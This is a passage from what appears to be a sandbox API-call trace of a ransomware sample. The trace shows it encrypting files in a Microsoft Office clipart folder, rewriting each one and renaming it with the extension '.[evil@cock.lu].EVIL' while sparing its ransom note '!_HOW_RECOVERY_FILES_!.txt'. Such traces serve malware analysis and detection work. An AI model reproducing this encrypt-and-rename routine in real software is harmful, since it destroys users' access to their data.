dwFileAttributes=0x200) returned 0 [0167.753] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.753] wcsstr (_Str="PSSKETSM.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.753] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSSKETSM.WMF") returned 69 [0167.753] wcscmp (_String1="PSSKETSM.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.753] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PSSKETSM.WMF") returned 0x0 [0167.753] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSSKETSM.WMF") returned 0x45 [0167.753] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSSKETSM.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pssketsm.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.756] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x776, lpOverlapped=0x0) returned 1 [0167.763] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.763] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.763] _errno () returned 0x84b1160840 [0167.763] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.763] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x780, lpOverlapped=0x0) returned 1 [0167.763] CloseHandle (hObject=0x1a8) returned 1 [0167.763] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSSKETSM.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.763] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.763] __uncaught_exception () returned 0x84b1160800 [0167.763] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.764] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSSKETSM.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pssketsm.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSSKETSM.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pssketsm.wmf.[evil@cock.lu].evil")) returned 1 [0167.765] ??_V@YAXPEAX@Z () returned 0x1 [0167.767] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSSKETSM.WMF", dwFileAttributes=0x200) returned 0 [0167.767] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.767] wcsstr (_Str="PSWAVY.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.767] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSWAVY.WMF") returned 67 [0167.767] wcscmp (_String1="PSWAVY.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.767] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PSWAVY.WMF") returned 0x0 [0167.767] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSWAVY.WMF") returned 0x43 [0167.767] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSWAVY.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pswavy.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.769] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb12, lpOverlapped=0x0) returned 1 [0167.777] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.777] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.777] _errno () returned 0x84b1160840 [0167.777] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.777] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb20, lpOverlapped=0x0) returned 1 [0167.777] CloseHandle (hObject=0x1a8) returned 1 [0167.777] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSWAVY.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.777] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.777] __uncaught_exception () returned 0x84b1160800 [0167.777] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.778] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSWAVY.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pswavy.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSWAVY.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pswavy.wmf.[evil@cock.lu].evil")) returned 1 [0167.779] ??_V@YAXPEAX@Z () returned 0x1 [0167.781] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSWAVY.WMF", dwFileAttributes=0x200) returned 0 [0167.781] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.781] wcsstr (_Str="RE00006_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.781] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\RE00006_.WMF") returned 69 [0167.781] wcscmp (_String1="RE00006_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.781] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="RE00006_.WMF") returned 0x0 [0167.781] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\RE00006_.WMF") returned 0x45 [0167.781] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\RE00006_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\re00006_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.783] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6ec, lpOverlapped=0x0) returned 1 [0167.791] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.791] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.791] _errno () returned 0x84b1160840 [0167.791] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.791] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x700, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x700, lpOverlapped=0x0) returned 1 [0167.791] CloseHandle (hObject=0x1a8) returned 1 [0167.791] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\RE00006_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.791] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.791] __uncaught_exception () returned 0x84b1160800 [0167.792] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.792] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\RE00006_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\re00006_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\RE00006_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\re00006_.wmf.[evil@cock.lu].evil")) returned 1 [0167.793] ??_V@YAXPEAX@Z () returned 0x1 [0167.795] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\RE00006_.WMF", dwFileAttributes=0x200) returned 0 [0167.795] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.795] wcsstr (_Str="RECYCLE.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.795] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\RECYCLE.WMF") returned 68 [0167.795] wcscmp (_String1="RECYCLE.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.795] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="RECYCLE.WMF") returned 0x0 [0167.795] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\RECYCLE.WMF") returned 0x44 [0167.796] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\RECYCLE.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\recycle.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.797] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd16, lpOverlapped=0x0) returned 1 [0167.805] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.805] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.805] _errno () returned 0x84b1160840 [0167.805] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.805] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd20, lpOverlapped=0x0) returned 1 [0167.805] CloseHandle (hObject=0x1a8) returned 1 [0167.805] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\RECYCLE.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.806] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.806] __uncaught_exception () returned 0x84b1160800 [0167.806] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.809] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\RECYCLE.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\recycle.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\RECYCLE.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\recycle.wmf.[evil@cock.lu].evil")) returned 1 [0167.810] ??_V@YAXPEAX@Z () returned 0x1 [0167.813] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\RECYCLE.WMF", dwFileAttributes=0x200) returned 0 [0167.814] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.814] wcsstr (_Str="ROAD_01.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.814] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 68 [0167.814] wcscmp (_String1="ROAD_01.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.814] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ROAD_01.MID") returned 0x0 [0167.814] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ROAD_01.MID") returned 0x44 [0167.814] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ROAD_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\road_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.816] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x175f, lpOverlapped=0x0) returned 1 [0167.824] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.824] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.824] _errno () returned 0x84b1160840 [0167.824] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.824] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x1760, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1760, lpOverlapped=0x0) returned 1 [0167.824] CloseHandle (hObject=0x1a8) returned 1 [0167.824] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ROAD_01.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.824] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.825] __uncaught_exception () returned 0x84b1160800 [0167.825] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.825] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ROAD_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\road_01.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ROAD_01.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\road_01.mid.[evil@cock.lu].evil")) returned 1 [0167.826] ??_V@YAXPEAX@Z () returned 0x1 [0167.829] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ROAD_01.MID", dwFileAttributes=0x200) returned 0 [0167.829] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.829] wcsstr (_Str="SAFRI_01.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.829] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 69 [0167.829] wcscmp (_String1="SAFRI_01.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.829] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SAFRI_01.MID") returned 0x0 [0167.829] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned 0x45 [0167.829] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\safri_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.832] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x278a, lpOverlapped=0x0) returned 1 [0167.847] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.847] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.847] _errno () returned 0x84b1160840 [0167.847] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.847] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x27a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x27a0, lpOverlapped=0x0) returned 1 [0167.847] CloseHandle (hObject=0x1a8) returned 1 [0167.847] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.847] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.848] __uncaught_exception () returned 0x84b1160800 [0167.848] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.848] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\safri_01.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\safri_01.mid.[evil@cock.lu].evil")) returned 1 [0167.849] ??_V@YAXPEAX@Z () returned 0x1 [0167.852] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SAFRI_01.MID", dwFileAttributes=0x200) returned 0 [0167.852] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.853] wcsstr (_Str="SCHOL_02.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.853] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 69 [0167.853] wcscmp (_String1="SCHOL_02.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.853] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SCHOL_02.MID") returned 0x0 [0167.853] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 0x45 [0167.853] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SCHOL_02.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\schol_02.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.855] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x13c2, lpOverlapped=0x0) returned 1 [0167.859] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.859] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.859] _errno () returned 0x84b1160840 [0167.859] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.859] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x13e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x13e0, lpOverlapped=0x0) returned 1 [0167.859] CloseHandle (hObject=0x1a8) returned 1 [0167.859] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SCHOL_02.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.859] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.859] __uncaught_exception () returned 0x84b1160800 [0167.859] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.860] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SCHOL_02.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\schol_02.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SCHOL_02.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\schol_02.mid.[evil@cock.lu].evil")) returned 1 [0167.861] ??_V@YAXPEAX@Z () returned 0x1 [0167.864] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SCHOL_02.MID", dwFileAttributes=0x200) returned 0 [0167.864] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.864] wcsstr (_Str="SHOW_01.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.864] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 68 [0167.864] wcscmp (_String1="SHOW_01.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.864] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SHOW_01.MID") returned 0x0 [0167.864] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SHOW_01.MID") returned 0x44 [0167.864] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SHOW_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\show_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.866] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x18f8, lpOverlapped=0x0) returned 1 [0167.879] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.879] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.880] _errno () returned 0x84b1160840 [0167.880] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.880] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x1900, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1900, lpOverlapped=0x0) returned 1 [0167.880] CloseHandle (hObject=0x1a8) returned 1 [0167.880] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SHOW_01.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.880] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.880] __uncaught_exception () returned 0x84b1160800 [0167.880] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.881] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SHOW_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\show_01.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SHOW_01.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\show_01.mid.[evil@cock.lu].evil")) returned 1 [0167.882] ??_V@YAXPEAX@Z () returned 0x1 [0167.885] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SHOW_01.MID", dwFileAttributes=0x200) returned 0 [0167.885] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.885] wcsstr (_Str="SL00256_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.885] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft 